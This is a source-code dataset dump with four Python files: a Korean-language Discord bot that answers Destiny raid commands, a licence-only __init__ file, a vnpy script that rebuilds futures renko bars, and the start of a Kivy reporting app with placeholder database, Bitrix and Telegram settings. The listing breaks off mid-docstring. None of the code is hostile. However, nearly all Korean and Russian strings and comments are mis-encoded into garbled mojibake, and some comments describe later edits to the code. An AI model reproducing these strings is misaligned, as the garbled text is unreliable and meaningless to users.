hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k โ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 โ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 โ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k โ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 โ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 โ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k โ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 โ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 โ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ace8b15cfe2e9b8a248347f5ce43fd0ec4795efc | 11,532 | py | Python | main.py | ruby3141/Destiny-Bot | 16353544d53a53e106a1ecb35478a713cf2aebd4 | [
"MIT"
] | null | null | null | main.py | ruby3141/Destiny-Bot | 16353544d53a53e106a1ecb35478a713cf2aebd4 | [
"MIT"
] | null | null | null | main.py | ruby3141/Destiny-Bot | 16353544d53a53e106a1ecb35478a713cf2aebd4 | [
"MIT"
] | null | null | null |
import asyncio
from configparser import ConfigParser
import copy
import json
import os
import random
import re
from collections import defaultdict
import discord
import atexit
from utility.issue import show_issue
from utility.init import *
from raid.dsc import *
from raid.gos import *
from raid.lw import *
from raid.no_named import *
from utility.utility import *
from utility.issue import *
# Discord client instance used by all event handlers below.
client = discord.Client()
user = discord.User
# Bot token is read from a local INI file kept out of version control.
config = ConfigParser()
config.read('./env/config.ini')
token = config['Default']['token']
# IDs of users the bot refuses to serve (Easter-egg "ignore" feature).
ignore_user_set = set()
@client.event
async def on_ready():
    """Startup hook: log the bot identity and greet in the dev-test channel."""
    print('We have logged in as {0.user}'.format(client))
    # ๋ด ๊ถํ์ด ์๋ ๊ณณ์๋ง ์ฐ๋๋ก ํ๋ฝํ์.
    # Fix: the channel-name literal contained a raw line break (encoding /
    # extraction artifact) which made this block a SyntaxError; it has been
    # re-joined onto one line. NOTE(review): confirm the exact original name.
    for guild in client.guilds:
        for channel in guild.text_channels:
            if channel.name == "๊ฐ๋ฐ-ํ์คํธ":
                await channel.send("์ผ์... ์ฌ๊ธฐ๊ฐ ์ด๋์ฃ ?")
@client.event
async def on_message(message):
    """Command dispatcher: messages starting with the call word drive the bot.

    Fix: several single-quoted literals below contained raw line breaks (an
    encoding/extraction artifact) and one spilled out of a commented line,
    making the module a SyntaxError; they were re-joined onto one line.
    NOTE(review): confirm the exact original wording of the re-joined strings.
    """
    #config ํ์ผ๋ก ๊ด๋ฆฌํ๋ ๋ฐฉ๋ฒ ์์๊น ๋ฆฌ์คํธ๋ ๋๋ฌด ์ง์ ๋ถํ๋ฐ...
    call_string = '์ฌ๊ธฐ๋ผ'
    activity_list = init_activity()
    raid_list = init_raid()
    raid_summary_list = ['๋ง์','๊ตฌ์ ','๋ฅ์คํค']
    error_message = f'{message.author.name} ์ํธ์๋, ์ ๊ฐ ์์๋ค์ ์ ์๋ ๋ง๋ก ๋ถํ๋๋ฆด๊ฒ์. **์ฌ๊ธฐ๋ผ ์ฌ์ฉ๋ฒ**์ ์ฐ๋ฉด ์ ๊ฐ ์ด๋ค ๋ง์ ์์๋ฃ๋์ง ์ ์ ์์ ๊ฑฐ์์.'
    # Never answer other bots (prevents reply loops).
    if message.author.bot:
        return
    if message.content.startswith(call_string):
        option = message.content.split(" ")
        option = option[1:]
        if len(option) == 0:
            num = 0
        else:
            num = init_num(option[-1])
        # Cap the repeat count at 10 to avoid flooding the channel.
        if num == -1 or num > 10:
            await message.channel.send(f"๋ฐ๋ณต์ ๋ฉ์ธ์ง๊ฐ ๋๋ฌด ๋ง์์ง๋ ๊ฒ์ ๋ฐฉ์งํ๊ธฐ ์ํด์ 10๋ฒ ์ดํ๋ก๋ง ๋๋ฆฌ๋๋ก ํ๊ณ ์์ด์.")
            await message.channel.send(f"ํ์ง๋ง ๋ฐ๋ณต ํ์๋ฅผ ๋๋ฌด ๋ง์ด ์ค์ ํ ๊ฑฐ ๊ฐ์์. ๊ทธ๋์ ํ ๋ฒ๋ง ํ๋ค๊ณ ์๊ฐํ๊ณ ๋งํด๋๋ฆด๊ฒ์.")
            num = 1
        # Easter egg: users on the ignore list must apologize first.
        if message.author.id in ignore_user_set:
            if len(option) > 0 and option[0] in ['๋ฏธ์', '๋ฏธ์ํด', '์๊ทธ๋ด๊ฒ']:
                ignore_user_set.remove(message.author.id)
                await message.channel.send("์ด๋ฒ ํ ๋ฒ๋ง ๋ด๋๋ฆด๊ฒ์. ๋ ๊ทธ๋ฌ๊ธฐ๋ง ํด ๋ด์.")
            else:
                await message.channel.send("์ ์ฃฝ์ด๋ ค ํ ๊ฒ์ ๋ํด ์ฌ๊ณผํ๊ธฐ ์ ๊น์ง๋ ์๋ฌด๊ฒ๋ ์คํํ์ง ์์๋์.")
        elif len(option) == 0:
            await message.channel.send(f"์ ๊ทธ๋ฌ์์ฃ ? {message.author.name} ์ํธ์๋?")
        elif option[0] == '์ํญํด':
            ignore_user_set.add(message.author.id)
            await message.channel.send(f"{message.author.name} ์ํธ์๋? ์ด๋ป๊ฒ... ์ ๋ฅผ ์ฃฝ์ด๋ ค ํ์ค ์๊ฐ ์์ฃ ?")
        elif '์๋ฐ๋ผ' in option:
            await message.channel.send("์ฌ๊ธฐ์ ๊ทธ ํ๋ ๋นก๋นก์ด๋ฅผ ์ ์ฐพ์ผ์๋ ๊ฑฐ์ฃ ?")
            await message.channel.send("์๋ฐ๋ผ๋ฅผ ์ฐพ์ ์ด์, ์๋ฌด๊ฒ๋ ์คํํ์ง ์์๋์.")
        elif option[0] == '๊ฐ์๋ฐ์๋ณด' or option[0] == "๊ฐ๋ง๋ณด":
            choose_one = random.choice(['๊ฐ์','๋ฐ์','๋ณด'])
            await message.channel.send(choose_one)
        elif option[0] == '๋๋ค':
            # Random activity, repeated `num` times and tallied per activity.
            if len(option) == 1 or (len(option) == 2 and num > 0 and '๋ฒ' in option[1]):
                activity_num_dict = defaultdict(lambda:0)
                for _ in range(num):
                    choosen_activity = choosen(activity_list)
                    activity_num_dict[choosen_activity] += 1
                text_dict = change_activity_text_dict(activity_num_dict)
                for x in text_dict:
                    await message.channel.send(x)
            # Random raid, same tallying scheme.
            elif option[1] == '๋ ์ด๋':
                raid_num_dict = defaultdict(lambda:0)
                for _ in range(num):
                    choosen_raid = choosen(raid_list)
                    raid_num_dict[choosen_raid] += 1
                text_dict = change_raid_text_dict(raid_num_dict)
                for x in text_dict:
                    await message.channel.send(x)
            else:
                await message.channel.send(error_message)
        elif option[0] in raid_summary_list:
            if option[0] == '๋ง์':
                if len(option) == 1:
                    lw_string = print_lw_named()
                elif option[1] == '1๋ด' or option[1] == '1๋ค์๋':
                    lw_string = print_no_named()
                elif option[1] == '2๋ด' or option[1] == '2๋ค์๋':
                    lw_string = print_lw_sec_named()
                elif option[1] == '3๋ด' or option[1] == '3๋ค์๋':
                    lw_string = print_lw_third_named()
                elif option[1] == '4๋ด' or option[1] == '4๋ค์๋':
                    lw_string = print_lw_forth_named()
                elif option[1] == '5๋ด' or option[1] == '5๋ค์๋':
                    lw_string = print_no_named()
                elif option[1] == '6๋ด' or option[1] == '6๋ค์๋':
                    lw_string = print_no_named()
                else:
                    lw_string = "์ํธ์๋, ๋ง์ง๋ง ์์์ 6๋ณด์ค๋ก ๋์ด ์๋ ๊ฑฐ ์์์ฃ ? ์๋๋ฉด ๋ช๋ น์ด๋ฅผ ์๋ชป ์๋ ฅํ ๊ฑฐ ๊ฐ์๋ฐ... ํ์ธํด์ฃผ์ธ์."
                await message.channel.send(lw_string)
            elif option[0] == '๊ตฌ์ ':
                if len(option) == 1:
                    gos_string = print_gos_named()
                elif option[1] == '1๋ด' or option[1] == '1๋ค์๋':
                    gos_string = print_gos_first_named()
                elif option[1] == '2๋ด' or option[1] == '2๋ค์๋':
                    gos_string = print_gos_sec_named()
                elif option[1] == '3๋ด' or option[1] == '3๋ค์๋':
                    gos_string = print_gos_third_named()
                elif option[1] == '4๋ด' or option[1] == '4๋ค์๋':
                    gos_string = print_gos_forth_named()
                else:
                    gos_string = "์ํธ์๋, ๊ตฌ์์ ์ ์์ ๋ณด์ค๊ฐ ์ด 4๋ช์๋ ๊ฑฐ ์์์ฃ ? ์๋๋ฉด ๋ช๋ น์ด๋ฅผ ์๋ชป ์๋ ฅํ ๊ฑฐ ๊ฐ์๋ฐ... ํ์ธํด์ฃผ์ธ์."
                await message.channel.send(gos_string)
            else:
                if len(option) == 1:
                    dsc_string = print_dsc_named()
                elif option[1] == '1๋ด' or option[1] == '1๋ค์๋':
                    dsc_string = print_dsc_first_named()
                elif option[1] == '2๋ด' or option[1] == '2๋ค์๋':
                    dsc_string = print_dsc_sec_named()
                elif option[1] == '3๋ด' or option[1] == '3๋ค์๋':
                    dsc_string = print_no_named()
                elif option[1] == '4๋ด' or option[1] == '4๋ค์๋':
                    dsc_string = print_dsc_forth_named()
                else:
                    dsc_string = "์ํธ์๋, ๋ฅ์คํค ๋ฌด๋ค์ 4๋ช์ ๋ณด์ค๊ฐ ๋๊ธฐํ๊ณ ์๋ ๊ฑฐ ์์์ฃ ? ์๋๋ฉด ๋ช๋ น์ด๋ฅผ ์๋ชป ์๋ ฅํ ๊ฑฐ ๊ฐ์๋ฐ... ํ์ธํด์ฃผ์ธ์."
                await message.channel.send(dsc_string)
        elif option[0] == '์ฌ์ฉ๋ฒ' or option[0] == 'help' or option[0] == '๋์':
            use_string = usage()
            await message.channel.send(use_string)
        elif option[0] == '์๋ผ๊ณ ๋' or option[0] == '์๋ผ๊ณ ๋ฅ':
            choose_one = random.choice(['๊ทธ๋ผ์. ๋ฌผ๋ก ์ด์ฃ .','์๋์.','์... ์ ๋ชจ๋ฅด๊ฒ ๋ค์. ์ค์๋ฆฌ์ค์๊ฒ ํ ๋ฒ ๋ฌผ์ด๋ณด์ฃ ...'])
            await message.channel.send(choose_one)
        elif option[0] == '์๋':
            await message.channel.send(f"{message.author.name} ์ํธ์๋, ์๋ํ์ธ์?")
        # elif option[0] == '์ค๋': #์ค๋
        #     if len(option) < 1:
        #         await message.channel.send("๋ด์ ์ฌ์ฉํ ์ ์์ต๋๋ค, ๋ช๋ น์ด๊ฐ ์๋๊ฒ ์๋์ง?")
        #     elif len(option) == 1:
        #         await message.channel.send("์ค๋ ๋์์ผ ํ๋ ๊ฒ์ ๋ํด์ ๋ง์๋๋ฆด๊ฒ์.")
        #         today_count = additive_option(count_activity)
        #         today_all_dict = multiple_activity(random_activity,today_count)
        #         for printer_ in print_random_dict(today_all_dict):
        #             await message.channel.send(printer_)
        #     elif option[1] == 'ํ๋':
        #         mode = random.randint(0,1)
        #         if mode == 0:
        #             option_set = ['easy','hard']
        #         else:
        #             option_set = ['hard','easy']
        #         today_count = additive_option(count_activity, option = option_set[0])
        #         today_all_dict = multiple_activity(random_activity,today_count,option = option_set[1])
        #         for printer_ in print_random_dict(today_all_dict):
        #             await message.channel.send(printer_)
        #     elif option[1] == '๋ผ์ดํธ':
        #         today_count = additive_option(count_activity, option = 'easy')
        #         today_all_dict = multiple_activity(random_activity,today_count)
        #         for printer_ in print_random_dict(today_all_dict):
        #             await message.channel.send(printer_)
        #     elif option[1] == "๊ณต๊ฒฉ์ ":
        #         if len(option) == 3:
        #             strike_num = additive_option(count_strike,option[2])
        #         else:
        #             strike_num = count_strike()
        #         string = string_format('๊ณต๊ฒฉ์ ',strike_num)
        #         await message.channel.send(string)
        #     elif option[1] == "๋ ์ด๋":
        #         if len(option) == 3:
        #             raid_num = additive_option(count_activity,option[2])
        #         else :
        #             raid_num = count_activity()
        #         string = string_format('๋ ์ด๋',raid_num)
        #         await message.channel.send(string)
        #         if len(option) > 3 or (len(option) == 3 and (option[2] != '๋ผ์ดํธ' and option[2] != 'ํ๋')):
        #             raid_dict = multiple_activity(random_raid,raid_num)
        #             for key, value in raid_dict.items():
        #                 string = print_raid(key)
        #                 string = string + f" {str(value)}๋ฒ ์ ๋๋ฉด ์ถฉ๋ถํ ๊ฑฐ ๊ฐ์์."
        #                 await message.channel.send(string)
        #     elif option[1] == "์์ฅ" or option[1].startswith("์๋ จ"):
        #         if len(option) >2 :
        #             crucible_num = additive_option(count_activity,option[2])
        #         else :
        #             crucible_num = count_activity()
        #         string = string_format('์๋ จ์ ์ฅ',crucible_num)
        #         await message.channel.send(string)
        #     else:
        #         await message.channel.send("์ด... ์ํธ์๋... ๋ญ๋ผ๊ณ ์...?")
        # #ํ๋
        # elif option[0] == command_list[4]:
        #     string = random_activity()
        #     string = print_activity(string)
        #     await message.channel.send(string)
        # #๋ ์ด๋
        # elif option[0] == command_list[3]:
        #     string = random_raid()
        #     string = print_raid(string)
        #     await message.channel.send(string)
        elif option[0] == '์๋ฐ์ดํธ':
            await message.channel.send(show_issue())
        else:
            await message.channel.send(error_message)
def additive_option(func_name, option='normal'):
    """Normalize *option* aliases to easy/hard/normal and delegate to *func_name*.

    Unknown values fall back to 'normal'.
    """
    if option in ("easy", "๋ผ์ดํธ"):
        normalized = 'easy'
    elif option in ("hard", "ํ๋"):
        normalized = 'hard'
    else:
        normalized = 'normal'
    return func_name(option=normalized)
def count_strike(option='normal'):
    """Pick a random strike count: 1-3 on 'easy', otherwise 3-30."""
    low, high = (1, 3) if option == 'easy' else (3, 30)  # normal/hard share a range
    return random.randint(low, high)
def count_activity(option='normal'):
    """Pick a random activity count: 1-2 easy, 5-10 hard, 3-6 otherwise."""
    ranges = {'easy': (1, 2), 'hard': (5, 10)}
    low, high = ranges.get(option, (3, 6))  # anything else counts as 'normal'
    return random.randint(low, high)
def string_format(option='๊ณต๊ฒฉ์ ', num=0):
    """Build the "how many <option> today? <num> times" announcement string."""
    return f"์ค๋ {option} ๋ช ํ ๊ฐ์ผ ํ๋์? {str(num)}ํ"
#must be iterator
def multiple_activity(func, num, option='normal'):
    """Call *func(option)* `num` times and tally how often each result appears.

    Returns a dict mapping result -> occurrence count.
    """
    tally = {}
    for _ in range(num):
        picked = func(option)
        tally[picked] = tally.get(picked, 0) + 1
    return tally
client.run(token)
| 39.765517 | 117 | 0.538935 |
ace8b18cff3facba9d2d521e1b87397cb3a2533b | 640 | py | Python | src/robotide/namespace/__init__.py | hoteltianya/RIDE | dcdccfec631517743d24c8e31fc6687fd29338a0 | [
"ECL-2.0",
"Apache-2.0"
] | 11 | 2017-09-30T05:47:28.000Z | 2019-04-15T11:58:40.000Z | src/robotide/namespace/__init__.py | hoteltianya/RIDE | dcdccfec631517743d24c8e31fc6687fd29338a0 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/robotide/namespace/__init__.py | hoteltianya/RIDE | dcdccfec631517743d24c8e31fc6687fd29338a0 | [
"ECL-2.0",
"Apache-2.0"
] | 7 | 2018-02-13T10:22:39.000Z | 2019-07-04T07:39:28.000Z | # Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from namespace import Namespace
| 40 | 75 | 0.759375 |
ace8b1b3a51a2ad868b3cc67bb3bf3632620e54c | 1,046 | py | Python | prod/jobs/refill_future_renko.py | howyu88/vnpy2 | c8ae445823dc1f71abda1a79fae7d4be3dd92dd4 | [
"MIT"
] | 323 | 2015-11-21T14:45:29.000Z | 2022-03-16T08:54:37.000Z | prod/jobs/refill_future_renko.py | howyu88/vnpy2 | c8ae445823dc1f71abda1a79fae7d4be3dd92dd4 | [
"MIT"
] | 9 | 2017-03-21T08:26:21.000Z | 2021-08-23T06:41:17.000Z | prod/jobs/refill_future_renko.py | howyu88/vnpy2 | c8ae445823dc1f71abda1a79fae7d4be3dd92dd4 | [
"MIT"
] | 148 | 2016-09-26T03:25:39.000Z | 2022-02-06T14:43:48.000Z | # flake8: noqa
# ่ชๅจ่กฅๅ
จๆ่ดงๆๆฐๅ็บฆrenko bar => Mongodb
# ไธ่ฝฝ็tickๆฐๆฎ็ผๅญ => tick_data/tdx/future
import sys, os, copy, csv, signal
# Make the vnpy repository root importable when running this script directly.
vnpy_root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..'))
if vnpy_root not in sys.path:
    print(f'append {vnpy_root} into sys.path')
    sys.path.append(vnpy_root)
# Environment flag read by vnpy. NOTE(review): meaning inferred from the name
# only — confirm how vnpy interprets VNPY_TESTING.
os.environ["VNPY_TESTING"] = "1"
from vnpy.data.renko.rebuild_future import *
if __name__ == "__main__":
    # Usage: <script> host symbol pricetick
    # Fix 1: the two message literals contained raw line breaks (encoding /
    # extraction artifact) and were re-joined onto one line so the script
    # parses. NOTE(review): confirm the exact original wording.
    # Fix 2: a usage error now exits with a non-zero status (was exit(),
    # which returns 0 and hides the failure from callers/schedulers).
    if len(sys.argv) < 4:
        print(u'่ฏท่พๅฅไธไธชๅๆฐ host symbol pricetick')
        sys.exit(1)
    print(sys.argv)
    host = sys.argv[1]
    setting = {
        "host": host,
        "db_name": FUTURE_RENKO_DB_NAME,
        "cache_folder": os.path.join(vnpy_root, 'tick_data', 'tdx', 'future')
    }
    builder = FutureRenkoRebuilder(setting)
    symbol = sys.argv[2]
    price_tick = float(sys.argv[3])
    print(f'ๅฏๅจๆ่ดงrenko่กฅๅจ,ๆฐๆฎๅบ:{host}/{FUTURE_RENKO_DB_NAME} ๅ็บฆ:{symbol}')
    builder.start(symbol=symbol, price_tick=price_tick, height=[3, 5, 10, 'K3', 'K5', 'K10'], refill=True)
    print(f'exit refill {symbol} renkos')
| 26.820513 | 106 | 0.651052 |
ace8b1d208142656a18b6cba992440ac1d08c2eb | 311,061 | py | Python | barsicreport2.py | sendhello/Barsic.Report | 3dc4bd1957df52b90b18f1cabf0ebba4ea6baec9 | [
"MIT"
] | 1 | 2018-08-14T16:40:49.000Z | 2018-08-14T16:40:49.000Z | barsicreport2.py | sendhello/Barsic.Report | 3dc4bd1957df52b90b18f1cabf0ebba4ea6baec9 | [
"MIT"
] | 4 | 2021-03-31T20:08:57.000Z | 2022-02-26T12:33:28.000Z | barsicreport2.py | sendhello/Barsic.Report | 3dc4bd1957df52b90b18f1cabf0ebba4ea6baec9 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import sys
from ast import literal_eval
import logging
from datetime import datetime, timedelta
import pyodbc
from typing import Dict, List, Any
from decimal import Decimal
from lxml import etree, objectify
import csv
from openpyxl import Workbook
from openpyxl.styles import PatternFill, Border, Side, Alignment, Protection, Font, Side
from dateutil.relativedelta import relativedelta
from typing import Tuple
from kivy.app import App
from kivy.uix.modalview import ModalView
from kivy.lang import Builder
from kivy.core.window import Window
from kivy.config import ConfigParser
from kivy.clock import Clock
from kivy.utils import get_color_from_hex, get_hex_from_color
from kivy.metrics import dp
from kivy.properties import ObjectProperty, StringProperty
from kivymd.dialog import MDDialog
from kivymd.bottomsheet import MDListBottomSheet, MDGridBottomSheet
from kivymd.textfields import MDTextField
from main import __version__
from libs.translation import Translation
from libs.uix.baseclass.startscreen import StartScreen
from libs.uix.lists import Lists
from libs.utils.showplugins import ShowPlugins
from libs import functions, to_google_sheets
from kivymd.theming import ThemeManager
from kivymd.label import MDLabel
from kivymd.time_picker import MDTimePicker
from kivymd.date_picker import MDDatePicker
from toast import toast
from dialogs import card
import yadisk
import urllib
import re
import requests
import webbrowser
import httplib2
import apiclient.discovery
from oauth2client.service_account import ServiceAccountCredentials
import telepot
import socks, socket
import time
logging.basicConfig(filename="barsic_reports.log", level=logging.INFO)
class BarsicReport2(App):
    """Main Kivy application: report UI, configuration and export logic."""
    # NOTE(review): the Cyrillic strings below look mis-encoded (mojibake);
    # the title is presumably the Russian app name — verify the source encoding.
    title = 'ะะฐััะธะบ.ะััะตัั'
    icon = 'icon.png'
    nav_drawer = ObjectProperty()
    theme_cls = ThemeManager()
    theme_cls.primary_palette = 'Purple'
    theme_cls.theme_style = 'Light'
    # Current UI locale code; observed via on_lang().
    lang = StringProperty('ru')
    # Last dates picked in the date dialogs (reused to pre-seed the pickers).
    previous_date_from = ObjectProperty()
    previous_date_to = ObjectProperty()
def __init__(self, **kvargs):
super(BarsicReport2, self).__init__(**kvargs)
Window.bind(on_keyboard=self.events_program)
Window.soft_input_mode = 'below_target'
self.list_previous_screens = ['base']
self.window = Window
self.plugin = ShowPlugins(self)
self.config = ConfigParser()
self.manager = None
self.window_language = None
self.exit_interval = False
self.dict_language = literal_eval(
open(
os.path.join(self.directory, 'data', 'locales', 'locales.txt')).read()
)
self.translation = Translation(
self.lang, 'Ttest', os.path.join(self.directory, 'data', 'locales')
)
self.date_from = datetime.strptime(datetime.now().strftime('%Y-%m-%d'), '%Y-%m-%d')
self.date_to = self.date_from + timedelta(1)
self.org1 = None
self.org2 = None
self.org3 = None
self.count_sql_error = 0
self.org_for_finreport = {}
self.new_service = []
self.orgs = []
self.new_agentservice = []
self.agentorgs = []
    def get_application_conorgfig(self):
        # NOTE(review): the name looks like a typo of Kivy's
        # ``get_application_config`` — as spelled, Kivy never calls this
        # override, so the INI path customization below is dead code.
        # Renaming would change the interface; confirm before fixing.
        return super(BarsicReport2, self).get_application_config(
            '{}/%(appname)s.ini'.format(self.directory))
    def build_config(self, config):
        """Create the application settings file barsicreport2.ini with defaults."""
        # General behaviour flags (stored as strings, parsed later with to_bool).
        config.adddefaultsection('General')
        config.setdefault('General', 'language', 'ru')
        config.setdefault('General', 'finreport_xls', 'False')
        config.setdefault('General', 'finreport_google', 'False')
        config.setdefault('General', 'finreport_telegram', 'False')
        config.setdefault('General', 'agentreport_xls', 'False')
        config.setdefault('General', 'split_by_days', 'False')
        config.setdefault('General', 'date_switch', 'True')
        config.setdefault('General', 'use_yadisk', 'False')
        config.setdefault('General', 'check_client_count_total_xls', 'False')
        config.setdefault('General', 'check_cashreport_xls', 'False')
        config.setdefault('General', 'check_itogreport_xls', 'False')
        # MS SQL connections: two report DBs, a Bitrix DB and an R-Keeper DB.
        config.adddefaultsection('MSSQL')
        config.setdefault('MSSQL', 'driver', '{SQL Server}')
        config.setdefault('MSSQL', 'server', '127.0.0.1\\SQLEXPRESS')
        config.setdefault('MSSQL', 'user', 'sa')
        config.setdefault('MSSQL', 'pwd', 'password')
        config.setdefault('MSSQL', 'database1', 'database')
        config.setdefault('MSSQL', 'database2', 'database')
        config.setdefault('MSSQL', 'database_bitrix', 'database')
        config.setdefault('MSSQL', 'server_rk', '127.0.0.1\\SQLEXPRESS')
        config.setdefault('MSSQL', 'user_rk', 'sa')
        config.setdefault('MSSQL', 'pwd_rk', 'password')
        config.setdefault('MSSQL', 'database_rk', 'database')
        # File-system locations of report templates and output folders.
        config.adddefaultsection('PATH')
        config.setdefault('PATH', 'reportXML', 'data/org_for_report.xml')
        config.setdefault('PATH', 'agentXML', 'data/org_plat_agent.xml')
        config.setdefault('PATH', 'itogreportXML', 'data/group_for_itogreport.xml')
        config.setdefault('PATH', 'local_folder', 'report')
        config.setdefault('PATH', 'path', 'report')
        config.setdefault('PATH', 'CREDENTIALS_FILE', 'data/1720aecc5640.json')
        config.setdefault('PATH', 'list_google_docs', 'data/list_google_docs.csv')
        # Bitrix 1C-exchange endpoint and credentials.
        config.adddefaultsection('Bitrix')
        config.setdefault('Bitrix', 'bitrix_exchange_url', 'example.site')
        config.setdefault('Bitrix', 'bitrix_exchange_path', '/bitrix/admin/1c_exchange.php')
        config.setdefault('Bitrix', 'bitrix_login', 'login')
        config.setdefault('Bitrix', 'bitrix_password', 'password')
        # Yandex.Disk upload token.
        config.adddefaultsection('Yadisk')
        config.setdefault('Yadisk', 'yadisk_token', 'token')
        # Telegram bot + optional SOCKS/HTTP proxy settings.
        config.adddefaultsection('Telegram')
        config.setdefault('Telegram', 'telegram_token', '111111111:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')
        config.setdefault('Telegram', 'telegram_chanel_id', '111111111111')
        config.setdefault('Telegram', 'telegram_proxy_use', 'False')
        config.setdefault('Telegram', 'telegram_proxy_type', '#PROXY_TYPE_SOCKS4 or PROXY_TYPE_SOCKS5 or PROXY_TYPE_HTTP')
        config.setdefault('Telegram', 'telegram_proxy_ip', '127.0.0.1')
        config.setdefault('Telegram', 'telegram_proxy_port', '1080')
        config.setdefault('Telegram', 'telegram_proxy_auth', 'False')
        config.setdefault('Telegram', 'telegram_proxy_username', 'username')
        config.setdefault('Telegram', 'telegram_proxy_password', 'password')
        # Google Sheets sharing: reader/writer e-mail lists.
        config.adddefaultsection('GoogleShets')
        config.setdefault('GoogleShets', 'google_all_read', 'False')
        config.setdefault('GoogleShets', 'google_reader_list', '')
        config.setdefault('GoogleShets', 'google_writer_list', '')
    def set_value_from_config(self):
        '''Read barsicreport2.ini and copy every setting onto the instance.'''
        self.config.read(os.path.join(self.directory, 'barsicreport2.ini'))
        # General flags.
        self.lang = self.config.get('General', 'language')
        self.finreport_xls = functions.to_bool(self.config.get('General', 'finreport_xls'))
        self.finreport_google = functions.to_bool(self.config.get('General', 'finreport_google'))
        self.finreport_telegram = functions.to_bool(self.config.get('General', 'finreport_telegram'))
        self.agentreport_xls = functions.to_bool(self.config.get('General', 'agentreport_xls'))
        # split_by_days is forced off here and driven by the UI switch instead.
        # self.split_by_days = functions.to_bool(self.config.get('General', 'split_by_days'))
        self.split_by_days = False
        self.date_switch = functions.to_bool(self.config.get('General', 'date_switch'))
        self.use_yadisk = functions.to_bool(self.config.get('General', 'use_yadisk'))
        self.check_client_count_total_xls = functions.to_bool(self.config.get('General', 'check_client_count_total_xls'))
        self.check_cashreport_xls = functions.to_bool(self.config.get('General', 'check_cashreport_xls'))
        self.check_itogreport_xls = functions.to_bool(self.config.get('General', 'check_itogreport_xls'))
        # MS SQL connections.
        self.driver = self.config.get('MSSQL', 'driver')
        self.server = self.config.get('MSSQL', 'server')
        self.user = self.config.get('MSSQL', 'user')
        self.pwd = self.config.get('MSSQL', 'pwd')
        self.database1 = self.config.get('MSSQL', 'database1')
        self.database2 = self.config.get('MSSQL', 'database2')
        self.database_bitrix = self.config.get('MSSQL', 'database_bitrix')
        self.server_rk = self.config.get('MSSQL', 'server_rk')
        self.user_rk = self.config.get('MSSQL', 'user_rk')
        self.pwd_rk = self.config.get('MSSQL', 'pwd_rk')
        self.database_rk = self.config.get('MSSQL', 'database_rk')
        # Paths.
        self.reportXML = self.config.get('PATH', 'reportXML')
        self.agentXML = self.config.get('PATH', 'agentXML')
        self.itogreportXML = self.config.get('PATH', 'itogreportXML')
        self.local_folder = self.config.get('PATH', 'local_folder')
        self.path = self.config.get('PATH', 'path')
        self.CREDENTIALS_FILE = self.config.get('PATH', 'CREDENTIALS_FILE')
        self.list_google_docs = self.config.get('PATH', 'list_google_docs')
        # External services: Yandex.Disk, Bitrix, Telegram, Google Sheets.
        self.yadisk_token = self.config.get('Yadisk', 'yadisk_token')
        self.bitrix_exchange_url = self.config.get('Bitrix', 'bitrix_exchange_url')
        self.bitrix_exchange_path = self.config.get('Bitrix', 'bitrix_exchange_path')
        self.bitrix_login = self.config.get('Bitrix', 'bitrix_login')
        self.bitrix_password = self.config.get('Bitrix', 'bitrix_password')
        self.telegram_token = self.config.get('Telegram', 'telegram_token')
        self.telegram_chanel_id = self.config.get('Telegram', 'telegram_chanel_id')  # '215624388'
        self.telegram_proxy_use = functions.to_bool(self.config.get('Telegram', 'telegram_proxy_use'))
        self.telegram_proxy_type = self.config.get('Telegram', 'telegram_proxy_type')
        self.telegram_proxy_ip = self.config.get('Telegram', 'telegram_proxy_ip')
        self.telegram_proxy_port = self.config.get('Telegram', 'telegram_proxy_port')
        self.telegram_proxy_auth = functions.to_bool(self.config.get('Telegram', 'telegram_proxy_auth'))
        self.telegram_proxy_username = self.config.get('Telegram', 'telegram_proxy_username')
        self.telegram_proxy_password = self.config.get('Telegram', 'telegram_proxy_password')
        self.google_all_read = functions.to_bool(self.config.get('GoogleShets', 'google_all_read'))
        self.google_reader_list = self.config.get('GoogleShets', 'google_reader_list')
        self.google_writer_list = self.config.get('GoogleShets', 'google_writer_list')
    def build(self):
        """Kivy entry point: load config, kv files and return the root widget."""
        self.set_value_from_config()
        self.load_all_kv_files(os.path.join(self.directory, 'libs', 'uix', 'kv'))
        self.screen = StartScreen()  # main screen of the application
        self.manager = self.screen.ids.manager
        self.nav_drawer = self.screen.ids.nav_drawer
        return self.screen
def load_all_kv_files(self, directory_kv_files):
for kv_file in os.listdir(directory_kv_files):
kv_file = os.path.join(directory_kv_files, kv_file)
if os.path.isfile(kv_file):
with open(kv_file, encoding='utf-8') as kv:
Builder.load_string(kv.read())
def events_program(self, instance, keyboard, keycode, text, modifiers):
'''ะัะทัะฒะฐะตััั ะฟัะธ ะฝะฐะถะฐัะธะธ ะบะฝะพะฟะบะธ ะะตะฝั ะธะปะธ Back Key
